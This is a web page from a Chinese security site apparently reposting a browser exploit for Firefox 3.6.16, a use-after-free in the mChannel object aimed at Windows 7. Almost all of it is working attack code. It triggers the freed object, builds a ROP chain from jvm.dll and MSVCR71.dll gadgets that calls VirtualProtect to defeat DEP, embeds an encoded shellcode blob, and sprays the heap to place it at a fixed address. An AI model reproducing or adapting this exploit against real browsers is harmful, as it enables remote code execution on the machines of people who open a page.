首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)
来源:http://www.metasploit.com 作者:mr_me 发布时间:2011-08-17  

<html>
<body>
<applet code="rubik.class" width=140 height=140></applet>
<p><b>Mozilla mChannel Object use after free</b><br />
- Found by regenrecht<br />
- MSF exploit by Rh0<br />
- Win 7 fun version by mr_me</p>
<!--
Notes:

- This exploit requires <= java 6 update 25.
- optimized heap spray and still works on mutiple tabs as
  the spray is large enough to hit the 0x10000000 block.
- If you really want the class file you can get it here:
  http://javaboutique.internet.com/Rubik/rubik.class,
  but java still loads without it.
- Tested on windows 7 ultimate (latest updates).
- http://bit.ly/qD4Jkc

-->
<object id="d"><object>
<script type="text/javascript">
function trigger(){
  alert('ready?');
  
  fakeobject = document.getElementById("d"); // allocate the object
         fakeobject.QueryInterface(Components.interfaces.nsIChannelEventSink); // append to the objects available functions
  fakeobject.onChannelRedirect(null,new Object,0); // free it

  /*
  fill the object with a fake vtable reference
  just use the start of a block for simplicity and use \x00
  because it expands to a NULL so that
  when we have have the CALL DWORD PTR DS:[ECX+18], it will point to 0x10000000
  */
  fakevtable = unescape("\x00%u1000");
  
  var rop = "";

  // 3 instructions to pivot cleanly
  rop += unescape("%u1033%u6d7f"); // 0x6D7F1033 -> MOV EAX,[ECX] / PUSH EDI / CALL [EAX+4] <jvm.dll>
  rop += unescape("%u10a7%u6d7f"); // 0x6D7F10A7 -> POP EBP / RETN <jvm.dll>
  rop += unescape("%u1441%u6d7f"); // 0x6D7F1441 -> XCHG EAX,ESP / RETN <jvm.dll>

  // generic rop taken from MSVCR71.dll (thanks to corelanc0d3r)
  rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN
  rop += unescape("%ua140%u7c37"); // 0x7c37a140 -> Make EAX readable
  rop += unescape("%u591f%u7c37"); // 0x7c37591f -> PUSH ESP / ... / POP ECX / POP EBP / RETN
  rop += unescape("%uf004%ubeef"); // 0x41414141 -> EBP (filler)
  rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN
  rop += unescape("%ua140%u7c37"); // 0x7c37a140 -> *&VirtualProtect()
  rop += unescape("%u30ea%u7c35"); // 0x7c3530ea -> MOV EAX,[EAX] / RETN
  rop += unescape("%u6c0b%u7c34"); // 0x7c346c0b -> Slide, so next gadget would write to correct stack location
  rop += unescape("%u6069%u7c37"); // 0x7c376069 -> MOV [ECX+1C],EAX / POP EDI / POP ESI / POP EBX / RETN
  rop += unescape("%uf00d%ubeef"); // 0x41414141 -> EDI (filler)
  rop += unescape("%uf00d%ubeef"); // 0x41414141 -> will be patched at runtime (VP), then picked up into ESI
  rop += unescape("%uf00d%ubeef"); // 0x41414141 -> EBX (filler)
  rop += unescape("%u6402%u7c37"); // 0x7c376402 -> POP EBP / RETN
  rop += unescape("%u5c30%u7c34"); // 0x7c345c30 -> ptr to 'push esp / ret '
  rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN
  rop += unescape("%udfff%uffff"); // 0xfffffdff -> size 0x00000201 -> ebx, modify if needed
  rop += unescape("%u1e05%u7c35"); // 0x7c351e05 -> NEG EAX / RETN
  rop += unescape("%u4901%u7c35"); // 0x7c354901 -> POP EBX / RETN
  rop += unescape("%uffff%uffff"); // 0xffffffff -> pop value into ebx
  rop += unescape("%u5255%u7c34"); // 0x7c345255 -> INC EBX / FPATAN / RETN
  rop += unescape("%u2174%u7c35"); // 0x7c352174 -> ADD EBX,EAX / XOR EAX,EAX / INC EAX / RETN
  rop += unescape("%ud201%u7c34"); // 0x7c34d201 -> POP ECX / RETN
  rop += unescape("%ub001%u7c38"); // 0x7c38b001 -> RW pointer (lpOldProtect) (-> ecx)
  rop += unescape("%ub8d7%u7c34"); // 0x7c34b8d7 -> POP EDI / RETN
  rop += unescape("%ub8d8%u7c34"); // 0x7c34b8d8 -> ROP NOP (-> edi)
  rop += unescape("%u4f87%u7c34"); // 0x7c344f87 -> POP EDX / RETN
  rop += unescape("%uffc0%uffff"); // 0xffffffc0 -> value to negate, target value : 0x00000040, target: edx
  rop += unescape("%u1eb1%u7c35"); // 0x7c351eb1 -> NEG EDX / RETN
  rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN
  rop += unescape("%u9090%u9090"); // 0x90909090 -> NOPS (-> eax)
  rop += unescape("%u8c81%u7c37"); // 0x7c378c81 -> PUSHAD / ADD AL,0EF / RETN

  sc = rop;  
  // nice big 'calccode' (0x400 bytes)
  sc += unescape("%uf869%u0d93%u3578%u7704%u902d%u432c%u249f%uba46%u983c%ub299%ufe13%uf9c0"+
  "%u784f%u2f7c%u4fa9%u7a76%ub235%u7027%u2f73%ub937%ud380%u0de3%u157f%u93b5%ubfba%u4291"+
  "%ufc03%u3d40%u729f%u9b24%u7e7b%u3814%u8dfd%u2592%u892c%u01e0%uf9d0%u41b1%uf731%u75e1"+
  "%ubb3f%u7d79%uf811%u6734%u992d%u4b49%u6690%u71b4%ua847%u094a%u05eb%u4eb3%ud119%u3ae2"+
  "%u0cd6%u96be%ub0b8%u4697%u98b7%u1048%ub6d5%u1c04%uf56b%u201d%u74d4%u773c%u727f%u7b7d"+
  "%u7e7c%u7571%u9743%u1c49%ubb90%u4e74%u3cb5%ua993%ub09f%u73ba%ud522%u8d4f%u98be%u3304"+
  "%u88f5%u43d4%u92b4%u7ab8%ud60a%u1da8%ub14a%uf82a%ub7b2%u2c41%u3b79%u05fd%u85b9%u76e0"+
  "%ufc1a%u4b35%u9647%u8134%u24e1%u8366%u48e3%u4214%u870c%uebd2%u3f78%u9bb3%uff1b%uc1c7"+
  "%u67e2%u910d%u70b6%u4615%u2d25%u772f%u993d%ubf27%u1240%u37f9%u7a77%u7279%u9167%u2f76"+
  "%ubeb5%u15b6%u7d7f%u303f%u40e3%u11b7%u19e0%u39e2%u04fc%ua8ba%u991d%ud518%u41bb%u78bf"+
  "%u9834%ub8b4%u270d%u8390%u4ffd%u31b1%u70e1%u4349%u86b3%u9ff5%u331c%ud6f7%u667e%ua93c"+
  "%u9b8d%uf687%u46d4%u4293%u7314%u3d35%u257b%u4a97%u37b0%u2496%u4b74%u2c75%u92b9%u2d7c"+
  "%u4748%u694e%uebd3%uf829%u08b2%u71f9%u790c%u717a%u227b%u05e2%u3cb8%u9fb6%u7896%uf903"+
  "%u217e%ubfd6%u4e91%u3db3%u777c%u0d76%u7372%u1541%ub2ba%u342c%u9048%ud484%ue189%u4f05"+
  "%u677f%ubbb9%u4370%u7d74%u1c75%ua92d%u1342%u93f5%u090c%u12e3%u92f8%u662f%u49b0%u8d99"+
  "%ub44b%uc688%uebc0%u474a%u2b37%u46fc%u0a9b%u04fd%ue086%u2740%ua8be%u35b5%u3f97%u24b1"+
  "%u1498%u25b7%u7c1d%u0b7f%ub1d5%u410c%u1047%u7deb%ue228%u7672%u7e78%u7177%u1b73%ufdd0"+
  "%u3bb2%u3ce0%u7515%u4e25%uf52a%u70b9%u3540%u9993%ubf2c%u85b5%u79fc%u3474%u377b%ud26b"+
  "%ubed5%u982d%ue33a%u9243%u7a14%ub33d%u9048%ubb8d%u9b24%u2f46%u20b0%uf9d1%ub897%ua866"+
  "%ub4b7%ua996%ub642%ue180%u4a27%u1a77%u9fd4%u017e%u18eb%u8cf8%ubad6%u1c7c%u497f%u7467"+
  "%u784f%u914b%u3271%u04e0%u0d7a%u1d79%u397b%ue2c1%u7d05%u933f%u70b1%ub324%u3cb8%u6642"+
  "%u961c%u9b27%u72bf%ue338%ub53d%u3040%ub4fc%u7646%uf525%u029f%ubad5%u0cf8%u3fa9%u7514"+
  "%ubb0d%u23e1%ub9d6%u05d4%u378d%ub243%ub735%u1573%u4798%u2c48%ua84b%ufd41%u4f2d%u1db6"+
  "%u9049%uf981%ube04%u3491%u924e%ub097%u2f4a%u9967%u8dbe%u5994%udbe7%ud9da%u2474%u58f4"+
  "%uc929%u33b1%u7031%u8312%u04c0%ufd03%ubb9a%u0112%ub24a%uf9dd%ua58b%u1c54%uf7ba%u5503"+
  "%uc7ef%u3b40%ua31c%uaf05%uc197%uc081%u6f10%ueff4%u41a1%ua338%uc362%ub9c4%u23b6%u72f4"+
  "%u22cb%u6e31%u7624%ue5ea%u6797%ubb9f%u892b%ub04f%uf114%u06ea%u4be0%u56f4%uc759%u4ebe"+
  "%u8fd1%u6f1e%ucc36%u2663%u2733%ub917%u7995%u88d8%ud6d9%u25e7%u27d4%u812f%u5207%uf25b"+
  "%u65ba%u8998%ue360%u293d%u53e2%uc8e6%u0527%uc66d%u418c%uca29%u8513%uf641%u2898%u7f86"+
  "%u0eda%u2402%u2fb8%u8013%u4f6f%u6c43%uf5cf%u9e0f%u8f04%uf44d%u1ddb%ub1e8%u1ddc%u91f3"+
  "%u2cb4%u7e78%ub0c2%u3bab%ufb3c%u6df6%ua2d5%u2c62%u54b8%u7259%ud6c5%u0a68%uc632%u0f18"+
  "%u407e%u7df0%u25ef%ud2f6%u6c10%ub595%uec82%u5074%u9623%u4188");

  // create a string with a ptr to the offset of our rop
  // used 0x1000001c to accomidate 0x18 + 0x4 (1st rop gadget)
  var filler = unescape("%u001c%u1000");
  while(filler.length < 0x100) {filler += filler;}

  /*
  create a string with 0x18 bytes at the start containing ptr's to the rop.
  This is to account for the vtable offset (0x18) -> 'CALL DWORD PTR DS:[ECX+18]'
  Then fill with sc + junk
  */
  var chunk = filler.substring(0,0x18/2);
  chunk += sc;
  chunk += filler;

  // create a string of size 64k in memory that contains sc + filler
  var heapblock = chunk.substring(0,0x10000/2);
  
  // keep adding more memory that contains sc + filler to reach 512kB
  while (heapblock.length<0x80000) {heapblock += heapblock;}

  /*
  using a final string of 512kB so that the spray is fast but ensuring accuracy
  - sub the block header length (0x24)
  - sub 1/4 of a page for sc (0x400)
  - sub the string length (0x04)
  - sub the null byte terminator
  */
  var finalspray = heapblock.substring(0,0x80000 - sc.length - 0x24/2 - 0x4/2 - 0x2/2);

  // optimised spray, precision can still be reliable even with tabs.
  // force allocation here of 128 blocks, using only 64MB of memory, speeeeeeed.
  arrayOfHeapBlocks = new Array()
  for (n=0;n<0x80;n++){
   arrayOfHeapBlocks[n] = finalspray + sc;
  }
}
trigger();
</script>
</body>
</html>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Sagem Router Fast 3304/3464/35
·F-secure Browsing Protection (
·Simple HTTPd 1.42 PUT Request
·Media Player Classic v1.2.1008
·RealPlayer 12.0.1.660 Stack Ov
·RealPlayer 12.0.1.660 Stack Ha
·Contrexx Shopsystem <= 2.2 SP3
·VLC Media Player 1.1.10 The Lu
·D.R. Software Audio Converter
·Windows Internet Explorer 9.0.
·NSHC Papyrus Heap Overflow Vul
·Wine ( Core exe ) GIF Object M
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved